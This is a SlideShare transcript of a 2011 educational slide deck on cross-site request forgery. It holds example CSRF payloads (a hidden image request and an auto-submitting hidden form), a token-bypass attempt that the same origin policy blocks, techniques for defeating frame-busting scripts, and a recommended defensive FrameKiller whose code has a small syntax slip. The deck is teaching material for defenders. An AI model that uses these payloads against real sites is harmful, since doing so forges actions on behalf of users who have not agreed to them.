CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011

3,792 views

Published on

Cross-Site Request Forgery (CSRF in short) is a kind of a web application vulnerability which allows malicious website to send unauthorized requests to a vulnerable website using active session of its authorized users.

Published in: Education, Technology, Design
1 Comment
5 Likes
Statistics
Notes
No Downloads
Views
Total views
3,792
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
7
Comments
1
Likes
5
Embeds 0
No embeds

No notes for slide

CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011

  1. 1. CROSS-SITE REQUEST FORGERY In-depth analysis 2011Copyright 2012 © CYBER GATESPermission is granted to copy, distribute and/ormodify this document under the terms of the GNUFree Documentation License
  2. 2. Cross-Site Request ForgeryThe OWASP Top 10 Web Application Security Risks A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF) Security Risks A6: Security Misconfiguration A7: Insecure Cryptographic Storage 2010 A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and ForwardsCross-Site Request Forgery  CYBER GATES  Page 2
  3. 3. Cross-Site Request ForgeryDescription Cross-Site Request Forgery (CSRF in short) is a kind of a web application vulnerability which allows malicious website to send unauthorized requests to a vulnerable website using active session of its authorized users.Example <img src=”http://twitter.com/home?status=evil.com” style=”display:none”/>Cross-Site Request Forgery  CYBER GATES  Page 3
  4. 4. Cross-Site Request ForgeryExample<div style=“display:none”><iframe name=“hiddenFrame”></iframe><form name=“Form” action=“http://site.com/post.php” target=“hiddenFrame”method=“POST”><input type=“text” name=“message” value=“I like www.evil.com” /><input type=“submit” /></form><script>document.Form.submit();</script></div>Cross-Site Request Forgery  CYBER GATES  Page 4
  5. 5. Cross-Site Request ForgeryUsless defenses Only accept POSTThis stops simple link-based attacks (IMG, frames, etc.).But hidden POST requests can be created with frames, scripts, etc. Referrer checkingSome users prohibit referrers, so you can’t just require referrerheaders.Techniques to selectively create HTTP request without referrersexist. Requiring multi-step transactionsCSRF attack can perform each step in order.Cross-Site Request Forgery  CYBER GATES  Page 5
  6. 6. Cross-Site Request ForgerySolutions CAPTHCA systemsThis is a type of challenge-response test used in computing toensure that the response is not generated by a computer. One-time tokensUnlike the CAPTCHA systems this is a unique number stored inthe web form field and in session to compare them after theform submission.Cross-Site Request Forgery  CYBER GATES  Page 6
  7. 7. Cross-Site Request Forgery &One-time tokensBypassing one-time tokens<html><head><title>BAD.COM</title><script language="javascript">function submitForm(){var token = window.frames[0].document.forms["messageForm"].elements["token"].value;var myForm = document.myForm;myForm.token.value = token;myForm.submit();}</script></head><body onLoad="submitForm();"><div style="display:none"><iframe src="http://good.com/index.php"></iframe><form name="myForm" target="hidden" action=http://good.com/post.php method="POST"><input type="text" name="message" value="I like www.bad.com" /><input type="hidden" name="token" value="" /><input type="submit" value="Post"></form></div></body></html>Same origin policyPermission denied to access property documentCross-Site Request Forgery  CYBER GATES  Page 7
  8. 8. Cross-Site Request Forgery &FrameKillersDescription FrameKillers are small piece of javascript codes used to protect web pages from being framed.Example if (top.location != location){ top.location = self.location; }Cross-Site Request Forgery  CYBER GATES  Page 8
  9. 9. Cross-Site Request Forgery &FrameKillersConditional statement  if (top != self)  if (top.location != self.location)  if (top.location != location)  if (parent.frames.length > 0)  if (window != top)  if (window.top !== window.self)  if (window.self != window.top)  if (parent && parent != window)  if (parent && parent.frames && parent.frames.length>0)Cross-Site Request Forgery  CYBER GATES  Page 9
  10. 10. Cross-Site Request Forgery &FrameKillersCounter-action statement  top.location = self.location  top.location.href = document.location.href  top.location.replace(self.location)  top.location.href = window.location.href  top.location.replace(document.location)  top.location.href = window.location.href  top.location.href = "URL"  document.write()  top.location.replace(document.location)  top.location.replace(URL)  top.location.replace(window.location.href)  top.location.href = location.href  self.parent.location = document.location  parent.location.href = self.document.locationCross-Site Request Forgery  CYBER GATES  Page 10
  11. 11. Cross-Site Request Forgery &FrameKiller killersFrameKiller killers Double framing <iframe src="second.html"></iframe> second.html <iframe src="http://www.site.com"></iframe> Using onBeforeUnload event <script> window.onbeforeunload=function(){ return “do you want to leave this page?“; } </script> <iframe src="http://www.site.com"></iframe>Cross-Site Request Forgery  CYBER GATES  Page 11
  12. 12. Cross-Site Request Forgery &Best PracticesFrameKiller <style> html{ display : none; } </style> <script> if( self == top ) { document.documentElement.style.display=block; } else { top.location = self.location; } </script>Note: This protects web application even if an attacker browses the webpageWith javascript disabled option in the browser.Cross-Site Request Forgery  CYBER GATES  Page 12
  13. 13. Cross-Site Request ForgeryReferences  Cross-Site Request Forgery http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29 http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery  Same Origin Policy http://en.wikipedia.org/wiki/Same_origin_policy  FrameKiller(Frame Busting) http://en.wikipedia.org/wiki/Framekiller http://seclab.stanford.edu/websec/framebusting/framebust.pdfCross-Site Request Forgery  CYBER GATES  Page 13
  14. 14. CYBER GATESContacts  Corporate website www.cybergates.am  Company profile on Twitter www.twitter.com/CyberGatesLLC  Company fan page on Facebook www.facebook.com/Cyber.Gates.page  Company profile on LinkedIn www.linkedin.com/company/CyberGates-LLC  Company channel on Vimeo www.vimeo.com/CyberGates  Company channel on YouTube www.youtube.com/TheCyberGatesCross-Site Request Forgery  CYBER GATES  Page 14
  15. 15. „Be one step ahead in Security.“www.cybergates.am

×